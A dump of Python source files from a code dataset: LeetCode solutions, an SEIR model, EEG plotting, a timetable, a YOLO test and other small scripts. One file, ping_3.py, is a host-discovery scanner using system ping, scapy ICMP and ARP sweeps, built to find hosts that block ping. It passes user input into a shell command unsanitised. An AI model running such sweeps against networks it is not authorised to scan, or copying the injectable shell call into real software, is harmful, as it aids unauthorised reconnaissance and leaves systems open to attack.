engine\n \"\"\" \n\n # curframe = inspect.currentframe()\n # calframe = inspect.getouterframes(curframe, 2)\n # print('file name:', calframe[1][1])\n # print('function name:', calframe[1][3])\n\n db_conn_string = get_database_string()\n\n engine = create_engine(db_conn_string)\n\n @event.listens_for(engine, \"connect\", insert=True)\n def set_search_path(dbapi_connection, connection_record):\n existing_autocommit = dbapi_connection.autocommit\n dbapi_connection.autocommit = True\n cursor = dbapi_connection.cursor()\n cursor.execute(\"SET SESSION search_path=public,augur_data,augur_operations,spdx\")\n cursor.close()\n dbapi_connection.autocommit = existing_autocommit\n\n return engine\n\n\nclass EngineConnection():\n\n def __init__(self, engine):\n self.connection = self.get_connection(engine)\n\n def __enter__(self):\n return self.connection\n\n def __exit__(self, exception_type, exception_value, exception_traceback):\n\n self.connection.close()\n\n def get_connection(self, engine):\n\n func = engine.connect\n\n return catch_operational_error(func)\n\n \n\n\n\n","sub_path":"augur/application/db/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"197493882","text":"class Solution(object):\r\n def search(self, nums, target):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type target: int\r\n :rtype: int\r\n \"\"\"\r\n index = -1\r\n left, right = 0, len(nums)-1\r\n if left == right and nums[0] == target:\r\n return 0\r\n \r\n while left < right:\r\n mid = left + (right - left) / 2\r\n if nums[left] == target: index = left\r\n if nums[mid] == target: index = mid\r\n if nums[right] == target: index = right\r\n if index != -1: break\r\n \r\n if target > nums[mid]:\r\n if nums[mid] < nums[right] and nums[right] < target:\r\n right = mid\r\n elif (nums[mid] > nums[right] and target > nums[right]) \\\r\n or (nums[mid] < nums[right] and target < nums[right]):\r\n left = mid + 1\r\n else:\r\n break\r\n elif target < nums[mid]:\r\n if nums[mid] > nums[right] and nums[right] > target:\r\n left = mid + 1\r\n elif (nums[mid] > nums[right] and target > nums[right]) \\\r\n or (nums[mid] < nums[right] and target < nums[right]):\r\n right = mid\r\n else:\r\n break\r\n return index\r\n \r\n\"\"\"\r\nAnother solution of mine inspired by:\r\nhttps://leetcode.com/discuss/80607/pretty-short-c-java-ruby-python\r\n\"\"\"\r\nclass Solution:\r\n def search(self, A, target):\r\n if A == []:\r\n return -1\r\n \r\n left, right = 0, len(A) - 1\r\n while left < right:\r\n mid = (left + right) / 2\r\n if A[mid] == target:\r\n return mid\r\n if A[left] < A[right]: # sorted in A[left : right+1]\r\n if target <= A[mid]:\r\n right = mid\r\n else:\r\n left = mid + 1\r\n else: # a drop in A[left : right+1]\r\n if A[mid] > A[right]:\r\n if A[left] <= target <= A[mid]:\r\n right = mid\r\n else:\r\n left = mid + 1\r\n else:\r\n if A[mid] <= target <= A[right]:\r\n left = mid + 1\r\n else:\r\n right = mid \r\n \r\n if A[right] == target:\r\n return right\r\n return -1\r\n \r\n###########################################################################\r\n\"\"\"\r\nA much more clever solution than mine!\r\nhttps://leetcode.com/discuss/80607/pretty-short-c-java-ruby-python\r\n\"\"\"\r\nclass Solution(object):\r\n def search(self, nums, target):\r\n left, right = 0, len(nums)-1\r\n while left < right:\r\n mid = left + (right - left) / 2\r\n if not ((nums[0] <= target) ^ (target <= nums[mid]) ^ (nums[mid] < nums[0])):\r\n # a^b^c->False only if they're all False or two of them are True(In this problem, they're impossible to be all False)\r\n right = mid\r\n else:\r\n left = mid + 1\r\n \r\n return left if nums[left] == target else -1\r\n \r\n###########################################################################\r\n\"\"\"\r\nA much more clever solution than mine! \r\nhttps://leetcode.com/discuss/80659/clever-idea-making-it-simple\r\n\"\"\"\r\nclass Solution(object):\r\n def search(self, nums, target):\r\n left, right = 0, len(nums)-1\r\n inf = float(\"inf\")\r\n while left < right:\r\n mid = left + (right - left) / 2\r\n num = nums[mid] if (nums[mid] < nums[0]) == (target < nums[0]) else ( -inf if target < nums[0] else inf )\r\n \r\n if num < target:\r\n left = mid + 1\r\n else:\r\n right = mid\r\n \r\n return left if nums[left] == target else -1","sub_path":"src/033_SearchInRotatedSortedArray.py","file_name":"033_SearchInRotatedSortedArray.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"21171836","text":"# -*- coding: utf-8 -*-\nfrom scipy.integrate import odeint\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom cProfile import label\n\n\nclass SEIR:\n\n def __init__(self,\n incubation_period=5.5,\n infective_period=7,\n basic_reproduction_rate=2,\n intervention_times=[70, 75, 100, 200, 300],\n p0=(83019212., 0., 1., 0.),\n t_vals=np.arange(0., 365., 1.)):\n self.t_inf = infective_period\n self.t_inc = incubation_period\n self.r0 = basic_reproduction_rate\n self.t_vals = t_vals\n self.p0 = tuple(p0)\n self.n = sum(self.p0)\n self.intervention_times = intervention_times\n\n def get_current_r(self, t, r_list):\n current_r = r_list[0]\n for i, intervention_time in enumerate(self.intervention_times):\n if t >= intervention_time:\n if (i + 1) < len(r_list):\n current_r = r_list[i + 1]\n return current_r\n\n def dS(self, t, susceptible, infectious, r_list):\n current_r = self.get_current_r(t, r_list)\n return -1 * susceptible / self.n * (current_r / self.t_inf * infectious)\n\n def dE(self, t, susceptible, exposed, infectious, r_list):\n current_r = self.get_current_r(t, r_list)\n return (susceptible / self.n) * (current_r / self.t_inf * infectious) - exposed / self.t_inc\n\n def dI(self, exposed, infectious):\n return exposed / self.t_inc - infectious / self.t_inf\n\n def dR(self, infectious):\n return infectious / self.t_inf\n\n def system(self, y, t, r_list=None):\n susceptible, exposed, infectious, removed = y\n if r_list is None:\n r_list = [self.r0] * len(self.intervention_times)\n return [self.dS(t, susceptible, infectious, r_list),\n self.dE(t, susceptible, exposed, infectious, r_list),\n self.dI(exposed, infectious),\n self.dR(infectious)]\n\n def __call__(self, t, r0, r1, r2, r3, e0):\n return np.sum(self.getSEIR(t, [r0, r1, r2, r3, r1, r0], e0)[:, 1:], axis=1)\n\n def getSEIR(self, t, r_list, e0):\n S0, E0, I0, R0 = self.p0\n p0 = (self.n - E0 - I0 - E0, e0, I0, R0)\n return odeint(self.system, y0=p0, t=t, args=(r_list,))\n\n\nif __name__ == \"__main__\":\n Sres = []\n Eres = []\n Ires = []\n Rres = []\n bev_de = 83019213.\n times = np.arange(0., 2 * 365., 1.0)\n inter_times = [70, 75, 100, 125, 150, 175, 200, 225, 250, 275]\n rep_values = [3.4, 2.5, 1.15, 0.8, 1.15, 0.8, 1.15, 0.8, 1.15, 0.8]\n e0 = 0.\n p = [bev_de - 1, e0, 1., 0.] # Start condition for S, E, I, R\n model = SEIR(p0=p, intervention_times=inter_times, t_vals=times)\n for p in model.getSEIR(times, rep_values, e0):\n # print(\"{0:09.0f}\\t{1:09.0f}\\t{2:09.0f}\\t{3:09.0f}\".format(*p))\n Sres.append(p[0])\n Eres.append(p[1])\n Ires.append(p[2])\n Rres.append(p[3])\n \n fig, ax = plt.subplots()\n #ax.plot(times, Sres, label='S')\n ax.plot(times, Eres, label='E')\n ax.plot(times, Ires, label='I')\n ax.plot(times, Rres, label='R')\n ax.set(xlabel='time (days)', ylabel='people', title='Plot SEIR model')\n ax.grid()\n ax.legend()\n \n #fig.savefig(\"seirmodel.png\")\n plt.show()\n \n","sub_path":"seirmodel/equations.py","file_name":"equations.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"155235857","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom glob import glob\nsns.set()\n\n\ndef load_data(source_folder, recording, sep):\n '''\n Loads power spectrum csv into a pandas DataFrame for all channges in the recording subdirectory of the source folder\n Parameters:\n source_folder = root folder for csv files\n recording = name of subdirectory for individual recording. Subdirectory should contain\n the csv files for each channel\n sep = operating system directory seperator e.g. '/'\n Returns:\n data = list of pandas DataFrames corresponding to different channels\n file_names = list of filenames (index is the same for data; i.e. the label for the first\n channel is file_names[0] and the corresponding data is found in data[0])\n '''\n data_dir = sep.join([source_folder, recording])\n os.chdir(data_dir)\n file_names = glob(\"*.csv\")\n data = [pd.read_csv(file, index_col=0) for file in file_names]\n return data, file_names\n\n\ndef manipulate_df(df):\n '''\n Manipulates a pandas df such that it is ready for time frequency analysis\n Parameters:\n df = pandas DataFrame\n Returns:\n log_df = logged values of df\n low_freqs_df = logged values of df indexed such that only the low frequencies are present\n '''\n log_df = np.log(df)\n log_df.reset_index(inplace=True)\n log_df['time'] = pd.to_timedelta(log_df['time'])\n log_df.set_index('time', inplace=True)\n low_freqs_df = log_df.iloc[:, :80]\n return log_df, low_freqs_df\n\n\ndef plot_mean_power(dfs, recording, chan_lab, both, dpi,\n fig_out_folder, verbose, sep):\n '''\n Takes a pandas DataFrame and plots mean power density accross all time periods\n Parameters:\n dfs = pandas DataFrame or list of two DataFrames\n recording = name of the recording being plotted\n chan_lab = label of the channel being plotted\n both = Bool, whether plotting both low and all frequencies,\n or (False) just all frequencies\n dpi = resolution of the produced image\n fig_out_folder = directory of the produced figure\n verbose = Bool\n sep = operating system directory seperator e.g. '/'\n '''\n if verbose:\n print('Plotting mean power figures')\n if both and len(dfs) == 2:\n f, a = plt.subplots(nrows=2, ncols=1, figsize=(10, 10))\n labs = ['All Frequencies', 'Low Frequencies']\n for ind, df in enumerate(dfs):\n mean_freqs = df.apply(np.mean, axis=0)\n a[ind].plot(mean_freqs.index, mean_freqs.values)\n a[ind].set_xlabel('Frequency (Hz)')\n a[ind].set_ylabel('Mean Power Density')\n a[ind].set_title(' '.join([recording, labs[ind], chan_lab]))\n else:\n f, a = plt.subplots(figsize=(10, 10))\n mean_freqs = dfs.apply(np.mean, axis=0)\n a.plot(mean_freqs.index, mean_freqs.values)\n a.set_xlabel('Frequency (Hz)')\n a.set_ylabel('Mean Power Density')\n a.set_title(recording)\n filename = genfirgure_fname(fig_out_folder,\n fig_type='mean_power',\n recording=recording,\n chan_lab=chan_lab,\n sep=sep)\n plt.tight_layout()\n plt.savefig(fname=filename, dpi=dpi)\n\n\ndef plot_spectrogram(dfs, recording, chan_lab,\n recording_len, dpi, verbose, both,\n fig_out_folder, vmin, vmax, sep):\n '''\n Takes a pandas DataFrame and plots and saves a spectrogram\n Parameters:\n dfs = pandas DataFrame or list of two DataFrames\n recording = name of the recording being plotted\n chan_lab = label of the channel being plotted\n recording_len = Length of the recording. Used to calculate xticks\n both = Bool, whether plotting both low and all frequencies,\n or (False) just all frequencies\n dpi = resolution of the produced image\n fig_out_folder = directory of the produced figure\n verbose = Bool\n sep = operating system directory seperator e.g. '/'\n '''\n if verbose:\n print('Plotting spectrograms')\n x_tick_pos = round(recording_len / 4)\n if both and len(dfs) == 2:\n f, a = plt.subplots(nrows=2, ncols=1, figsize=(10, 10))\n labs = ['All Frequencies', 'Low Frequencies']\n for ind, df in enumerate(dfs):\n sns.heatmap(df.transpose(),\n vmin=vmin, vmax=vmax, cmap='coolwarm',\n xticklabels=x_tick_pos, ax=a[ind])\n a[ind].set_ylabel('Frequency\\n(Hz)')\n a[ind].set_xticklabels(list(map(lambda num:\n str(round(recording_len / 4 / 60 * num,\n -1)),\n [0, 1, 2, 3])))\n a[ind].set_xlabel('Time \\n(min)')\n a[ind].set_title(labs[ind])\n a[ind].invert_yaxis()\n filename = genfirgure_fname(fig_out_folder,\n fig_type='spectrograms',\n recording=recording,\n chan_lab=chan_lab,\n sep=sep)\n else:\n f, a = plt.subplots(figsize=(10, 10))\n sns.heatmap(dfs.transpose(),\n vmin=vmin, vmax=vmax, cmap='coolwarm',\n xticklabels=x_tick_pos, ax=a)\n a.set_ylabel('Frequency\\n(Hz)')\n a.set_xticklabels(list(map(lambda num:\n str(round(recording_len / 4 / 60 * num,\n -1)),\n [0, 1, 2, 3])))\n a.set_xlabel('Time \\n(min)')\n a.set_title(recording)\n a.invert_yaxis()\n filename = genfirgure_fname(fig_out_folder,\n fig_type='spectrograms',\n recording=recording,\n chan_lab=chan_lab,\n sep=sep)\n plt.tight_layout()\n plt.savefig(fname=filename, dpi=dpi)\n\n\ndef genfirgure_fname(fig_out_folder, fig_type, recording,\n chan_lab, sep):\n '''\n Generates an absolute path to a .png figure\n Creates nessessary directories\n Parameters:\n fig_out_folder = root figure folder\n fig_type = category of figure\n recording = name of recording\n chan_lab = chan label for data\n sep = operating system directory seperator e.g. '/'\n '''\n out_dir = sep.join([fig_out_folder, fig_type])\n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n out_dir = sep.join([out_dir, recording])\n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n return sep.join([out_dir, recording]) + '_' + chan_lab + '.png'\n","sub_path":"eeg_analysis/spectrograms/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":7309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"333866094","text":"# Imports two library to our game\nimport pygame\nimport random\n\n#Initialize the pygame (;oop, game screen)\npygame.init()\n\n#Declares some variables\nwinHeight = 480\nwinWidth = 700\nGREEN = (0, 255, 0)\n\n#Create window game\nwin = pygame.display.set_mode((winWidth,winHeight))\npygame.display.set_caption(\"Drown Guy\")\n\n#main program\n# create game loop to keep the window\ninPlay = True\nwhile inPlay:\n win.fill(GREEN) #Make background colour green\n pygame.display.update\n pygame.time.delay(10)\n \n\n\n\n\n#quit the pygame\npygame.quit()\n","sub_path":"CODE/DrownGuy.py","file_name":"DrownGuy.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"348531991","text":"import itertools\r\nn=int(input())\r\nl=str(input())\r\nl=l.replace(\" \",\"\")\r\nlist_arr=[]\r\n\r\nfor subset in itertools.permutations(str(l), len(l)):\r\n a=''.join(map(str,subset))\r\n list_arr.append(int(a))\r\nprint(max(list_arr))","sub_path":"set-1/Longest number.py","file_name":"Longest number.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"365847948","text":"#!/usr/bin/python\n#coding=utf-8\n\nimport multiprocessing \nimport time\nimport ipaddress\nfrom scapy.all import *\nimport logging\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\nimport subprocess \n\n\n#if len(list(ipaddress.IPv4Network(ip_net))) > 50:\n#\tprocess_number = 50\n#else :\n#\tprocess_number = len(list(ipaddress.IPv4Network(ip_net)))\n\n#---------------------------------------------------------------------\ndef icmp_ping(ipaddr):\n\tans , unans = sr(IP(dst=ipaddr)/ICMP(type='echo-request' , code=0)/'abcdefghijklmnopqrst', timeout = 1 , verbose = False)\n\tif ans:\n\t\treturn (ipaddr , 1)\n\telif unans:\n\t\treturn (ipaddr , 0)\n\telse :\n\t\tprint ('An unexpected error occured')\n\ndef multi_icmp_ping(ip_net):\n\tip_list = []\n\tip_active =[]\n\tip_inactive = []\n\tfor i in ipaddress.IPv4Network(ip_net):\n\t\tip_list.append(str(i))\n\tprint ('listing compelet')\n\tpool = multiprocessing.Pool(processes=50)\n\tresult = pool.map(icmp_ping, ip_list)\n\tfor ip,code in result:\n\t\tif code == 1:\n\t\t\tip_active.append(ip)\n\t\telif code == 0:\n\t\t\tip_inactive.append(ip)\n\t\telse :\n\t\t\tpass\n\tprint ('-' * 30+'\\nactive ip address:\\n'+'-' * 30 )\n\tprint (ip_active)\n\tprint ('-' * 30+'\\ninactive ip address:\\n' + '-' * 30 )\n\tprint (ip_inactive)\n\t#return (ip_active)\n#-----------------------------------------------------------------------\n\ndef sys_ping(ipaddr):\n\t\n\tif subprocess.call('ping -c 1 %s > /dev/null' % ipaddr,shell = True) == 0:\n\t\tprint ('%-15s ----> up !' % ipaddr )\n\telse :\n\t\tprint ('%-15s ----> down .' % ipaddr )\n\n#--------------------------------------------------------------------------\ndef ARP_ping(ipaddr):\n\tans,unans = srp(Ether(dst=\"ff:ff:ff:ff:ff:ff\")/ARP(pdst=ipaddr),timeout=2,verbose = False)\n\t#ans.summary(lambda s,r: r.sprintf(\"%IP.src% is alive\") ) \n\ttotal_alive_num = len(ans)\n\tprint ('-' * 35)\n\tfor i in range(total_alive_num):\n\t\t#percent = 1.0 * (i+1) / 2 * 100 \n\t\talive_ip = ans[i][1].getlayer(ARP).psrc\n\t\talive_mac = ans[i][1].getlayer(ARP).hwsrc\n\t\tprint ('%-15s:[%17s] --> is alive' % (alive_ip,alive_mac))\n\n\nif __name__ == '__main__':\n\tmethod_ping_str = input ('''请输入你需要使用的工具(数字1、2、3):\n 1 --> ip range 系统命令,比较靠谱,速度较快;\n 2 --> ip net scapy_ping 程序自己铸造数据包,速度稍慢,返回在线主机列表,离线主机列表;\n 3 --> ARP ping 同网段速度快,禁ping也能发现你; \n ps: 愿你想ping通你所需要ping通的地址。 |>_<| \\n ''')\n\tmethod_ping = int(method_ping_str)\n\n\tif method_ping == 1 :\n\t\tiplist = []\n\t\tip_min = input('Plz input the low IP address : \\n')\n\t\tip_max = input('Plz input the high IP address : \\n')\n\t\t#eg:\n\t\t#ip_min = '192.168.3.2'\n\t\t#ip_max = '192.168.3.50'\n\t\tip_tmp = ip_min.split('.')\n\t\tlow = int(ip_min.split('.')[3])\n\t\thigh = int(ip_max.split('.')[3])\n\t\tfor i in range( high - low ):\n\t\t\tip_tmp[3] = str(low + ( i + 1 ))\n\t\t\tiplist.append('.'.join(ip_tmp))\n\t\tprocess_number = 50\n\t\tpool = multiprocessing.Pool(processes=process_number) \n\t\tfor ip in iplist:\n\t\t\tpool.apply_async(sys_ping,(ip,)) \n\t\tpool.close() \n\t\tpool.join()\n\n\telif method_ping == 2:\n\t\tip_net = input('Plz input the ip net : <192.168.1.0/24> \\n')\n\t\tmulti_icmp_ping(ip_net)\n\n\telif method_ping == 3:\n\t\tipaddr = input ('Plz input the ip net : <192.168.1.0/24> \\n')\n\t\tARP_ping(ipaddr)\n\telse :\n\t\tprint('input error !')\n\n\n","sub_path":"ping_3.py","file_name":"ping_3.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"450233368","text":"# Extend the task by requiring the subject to respond by pressing a spacebar (the key is called 'space'), \n# as quickly as possible anytime the name on the screen matches the name you entered into the box \n# (so if I enter 'Gary' I would have to press 'space' anytime the name 'Gary' shows up. \n# If the participant presses 'space' to the wrong name (false alarm), or misses the name (a miss), show a red X.\n\n\nimport time\nimport sys\nimport random\nfrom psychopy import visual,event,core,gui\n\nuserVar = {'Name' : 'Enter your name'}\ndlg = gui.DlgFromDict(userVar)\n\nnames = open('names.txt', 'r').readlines()\nfirstNames = [name.split(' ')[0] for name in names]\nlastNames = [name.split(' ')[1] for name in names]\n\n\nif userVar['Name'] not in firstNames:\n\n\tdef popupError(text):\n\t\terrorDlg = gui.Dlg(title=\"Error\", pos=(200,400))\n\t\terrorDlg.addText('Error: '+text, color='Red')\n\t\terrorDlg.show()\n\tpopupError('Name Does not exist!')\n\n\nwin = visual.Window([800,600],color=\"black\", units='pix')\nnameStim = visual.TextStim(win,text=\"\", height=40, color=\"white\",pos=[0,0])\nposFB = visual.TextStim(win,text=\"0\", height=40, color=\"green\",pos=[0,0])\nnegFB = visual.TextStim(win,text=\"X\", height=40, color=\"red\",pos=[0,0])\n\nshowFirstName = True\nwhile True:\n\tif showFirstName == True:\n\t\tnameShown = random.choice(firstNames)\n\t\tnameType = 'f'\n\telse:\n\t\tnameShown = random.choice(lastNames)\n\t\tnameType = 'l'\n\tnameStim.setText(nameShown)\n\tnameStim.draw()\n\twin.flip()\n\tspaceKey = event.waitKeys(keyList=['space'], maxWait=1)\n\tif nameShown == userVar['Name']:\n\t\tif spaceKey == None:\n\t\t\tnegFB.draw()\n\t\t\twin.flip()\n\t\t\tcore.wait(.5)\n\n\twin.flip()\n\tcore.wait(.5)\n\twin.flip()\n\tshowFirstName = not showFirstName\n\tif event.getKeys(['q']):\n\t\tbreak","sub_path":"exercise2-8.py","file_name":"exercise2-8.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"263495892","text":"\nimport pyarrow.parquet as pq\nimport pyarrow.csv as pv\n\ncsvfile = 'pressureVacuum.csv'\n\ntb = pv.read_csv(csvfile,parse_options=pv.ParseOptions(delimiter=','))\n\nprint(tb)\n\nparquetfile = 'pressureVacuum.parquet'\n\npq.write_table(tb,parquetfile,compression='BROTLI')\n# {'NONE', 'SNAPPY', 'GZIP', 'LZO', 'BROTLI', 'LZ4', 'ZSTD'}\n\ndf = pq.read_table(parquetfile,columns=None)\n\nprint(df)\n","sub_path":"parquet/pyarrow_arm/pyarrow_test.py","file_name":"pyarrow_test.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"625793377","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: 122.py.py \n Description : \n Author : cugxy \n date: 2020/02/15 \n-------------------------------------------------\n Change Activity:\n 2020/02/15 \n-------------------------------------------------\n\n给定一个数组,它的第 i 个元素是一支给定股票第 i 天的价格。\n\n设计一个算法来计算你所能获取的最大利润。你可以尽可能地完成更多的交易(多次买卖一支股票)。\n\n注意:你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。\n\n示例 1:\n\n输入: [7,1,5,3,6,4]\n输出: 7\n解释: 在第 2 天(股票价格 = 1)的时候买入,在第 3 天(股票价格 = 5)的时候卖出, 这笔交易所能获得利润 = 5-1 = 4 。\n  随后,在第 4 天(股票价格 = 3)的时候买入,在第 5 天(股票价格 = 6)的时候卖出, 这笔交易所能获得利润 = 6-3 = 3 。\n示例 2:\n\n输入: [1,2,3,4,5]\n输出: 4\n解释: 在第 1 天(股票价格 = 1)的时候买入,在第 5 天 (股票价格 = 5)的时候卖出, 这笔交易所能获得利润 = 5-1 = 4 。\n  注意你不能在第 1 天和第 2 天接连购买股票,之后再将它们卖出。\n  因为这样属于同时参与了多笔交易,你必须在再次购买前出售掉之前的股票。\n示例 3:\n\n输入: [7,6,4,3,1]\n输出: 0\n解释: 在这种情况下, 没有交易完成, 所以最大利润为 0。\n\n\"\"\"\n\n\nclass Solution:\n def maxProfit(self, prices):\n if not prices:\n return 0\n s_idx = 0\n pricess = []\n for idx, _ in enumerate(prices):\n p = None\n if idx == len(prices) - 1:\n p = prices[s_idx:idx+1]\n if p:\n pricess.append(p)\n break\n if prices[idx] > prices[idx + 1]:\n p = prices[s_idx:idx + 1]\n s_idx = idx + 1\n if p:\n pricess.append(p)\n if not pricess:\n pricess.append(prices)\n rs = 0\n for prices in pricess:\n if not prices or len(prices) == 1:\n continue\n min_v = 2147483647\n r = 0\n for e in prices:\n if e < min_v:\n min_v = e\n elif e - min_v > r:\n r = e - min_v\n rs += r\n return rs\n\n\nif __name__ == '__main__':\n s = Solution()\n if 0:\n p3 = [1,2,3,4,5]\n print(s.maxProfit(p3))\n if 0:\n p1 = [7, 1, 5, 3, 6, 1]\n print(s.maxProfit(p1))\n if 1:\n p2 = [6,1,3,2,4,7]\n print(s.maxProfit(p2))\n pass\n","sub_path":"scripts/leetcode/122.py","file_name":"122.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"537406757","text":"import datetime\r\n\r\ndef Timetable():\r\n now=datetime.datetime.now()\r\n time = now.time()\r\n now = now.weekday()\r\n nownow=now\r\n if now==1 or now == 5 or now == 6:\r\n return '''\r\nСвобода\\n'''\r\n if now == 0:\r\n if nownow==now and int(time.strftime(\"%H\")) * 60 + int(time.strftime(\"%M\")) > 20 * 60 + 5:\r\n now += 1\r\n else:\r\n return '''Расписание на понедельник\\n\\n\r\nИстория механики\\n\r\n12:30 - 14:05\\n\r\n16-24\\n\\n\r\nСпецкурс\\n\r\n15:00 - 16:35\\n\r\n12-06\\n\\n\r\nКафедральный семинар\\n\r\n16:45 - 18:20\\n\r\n12-25\\n\\n\r\nКурс написания научных статей\\n\r\n18:30 - 20:05\\n\r\n12-25\\n'''\r\n if now == 2:\r\n if nownow==now and int(time.strftime(\"%H\")) * 60 + int(time.strftime(\"%M\")) > 14 * 60 + 5:\r\n now += 1\r\n else:\r\n if datetime.strftime('%j')-51 % 14 == 0:\r\n return '''Расписание на среду\\n\\n\r\n Экономика\\n\r\n 10:45 - 12:20\\n\r\n 16-22\\n\\n\r\n Философия\\n\r\n 12:30 - 14:05\\n\r\n 13-06\\n'''\r\n else:\r\n return '''Расписание на среду\\n\\n\r\nФилософия\\n\r\n10:45 - 12:20\\n\r\n16-22\\n\\n\r\nФилософия\\n\r\n12:30 - 14:05\\n\r\n13-06\\n'''\r\n if now == 3:\r\n if nownow==now and int(time.strftime(\"%H\")) * 60 + int(time.strftime(\"%M\")) > 12 * 60 + 20:\r\n now += 1\r\n else:\r\n return '''Расписание на четверг\\n\\n\r\nЭкономика\\n\r\n10:45 - 12:20\\n\r\n12-24\\n'''\r\n if now == 4:\r\n if nownow==now and int(time.strftime(\"%H\")) * 60 + int(time.strftime(\"%M\")) > 12 * 60 + 20:\r\n return '''\r\nСвобода\\n'''\r\n else:\r\n return'''Расписание на пятницу\\n\\n\r\nИстория механики\\n\r\n10:45 - 12:20\\n\r\n16-24\\n'''\r\n\r\n","sub_path":"timetable.py","file_name":"timetable.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"606040492","text":"import torch\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nfrom os import listdir\r\nfrom os.path import isfile, isdir, join\r\nimport models\r\nimport loss\r\nimport loaddata\r\n\r\ncategory=(\r\n\"plane\",\r\n\"ship\",\r\n\"storage-tank\",\r\n\"baseball-diamond\",\r\n\"tennis-court\",\r\n\"basketball-court\",\r\n\"ground-track-field\",\r\n\"harbor\",\r\n\"bridge\",\r\n\"small-vehicle\",\r\n\"large-vehicle\",\r\n\"helicopter\",\r\n\"roundabout\",\r\n\"soccer-ball-field\",\r\n\"swimming-pool\",\r\n\"container-crane\")\r\n\r\ndef _iou(boxes1 , boxes2 ):\r\n\r\n #iou[n,m]=boxes[n]和boxes2[m]的iou x,y,w,h\r\n \"\"\"\r\n xy1_1=boxes_xywh1[:,:2]-(boxes_xywh1[:,2:])*0.5*7\r\n xy2_1=boxes_xywh1[:,:2]+(boxes_xywh1[:,2:])*0.5*7\r\n boxes1=torch.cat((xy1_1,xy2_1),1)\r\n\r\n xy1_2=boxes_xywh2[:,:2]-(boxes_xywh2[:,2:])*0.5*7\r\n xy2_2=boxes_xywh2[:,:2]+(boxes_xywh2[:,2:])*0.5*7\r\n boxes2=torch.cat((xy1_2,xy2_2),1)\r\n \"\"\"\r\n n1=boxes1.size(0)\r\n n2=boxes2.size(0)\r\n x1y1max=torch.max(boxes1[:,:2].unsqueeze(1).expand(n1,n2,2),boxes2[:,:2].unsqueeze(0).expand(n1,n2,2),)\r\n x2y2min=torch.min(boxes1[:,2:].unsqueeze(1).expand(n1,n2,2),boxes2[:,2:].unsqueeze(0).expand(n1,n2,2),)\r\n\r\n inter_size= x2y2min - x1y1max\r\n inter_size[inter_size<0]=0.\r\n inter_area=inter_size[:,:,0]*inter_size[:,:,1]\r\n\r\n area1 = ((boxes1[:,2]-boxes1[:,0])*(boxes1[:,3]-boxes1[:,1])).unsqueeze(1).expand(n1,n2)\r\n area2 = ((boxes2[:,2]-boxes2[:,0])*(boxes2[:,3]-boxes2[:,1])).unsqueeze(0).expand(n1,n2)\r\n iou = inter_area/(area1+area2-inter_area)\r\n\r\n return iou\r\n\r\n\r\ndef main(images_path=\"hw2_train_val/val1500/images\",targets_path=\"hw2_train_val/val1500/labelTxt_hbb\"):\r\n\r\n theshold=0.1\r\n\r\n\r\n\r\n testloss=0.\r\n count=0\r\n imgnames,imgs,targets=loaddata.read_val_data(images_path,targets_path)\r\n\r\n net=models.Yolov1_vgg16bn(pretrained=True)\r\n #\r\n net.cuda()\r\n print(type(net))\r\n net.load_state_dict(torch.load(\"train_model66.pth\"))\r\n\r\n for i in range(imgs.size(0)):\r\n img_3_448_448=torch.stack((imgs[i][:,:,0],imgs[i][:,:,1],imgs[i][:,:,2]))\r\n img_3_448_448=img_3_448_448.cuda()\r\n img_3_448_448=img_3_448_448.unsqueeze(0)\r\n img_3_448_448=img_3_448_448.float()\r\n\r\n\r\n output=net(img_3_448_448)\r\n t=targets[i].unsqueeze(0)\r\n t=t.cuda()\r\n\r\n\r\n testloss=testloss+float(loss.trainloss(output,t,5,0.5))\r\n count+=1\r\n \"\"\"\r\n for j in range(16):\r\n looked_data=output[0][:,:,:4]\r\n \"\"\"\r\n\r\n\r\n\r\n print(testloss/count)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"traintest.py","file_name":"traintest.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"57586383","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.indexPage, name='shop-index'),\n path('index/', views.indexPage, name='shop-index'),\n path('products/', views.productsPage, name='shop-products'),\n path('login/', views.loginPage, name='shop-login'),\n path('register/', views.registerPage, name= 'shop-register'),\n path('logout/', views.logoutPage, name= 'shop-logout'),\n path('products/', views.singleProduct, name='shop-individual'),\n path('cart/', views.myCart, name='shop-cart'),\n 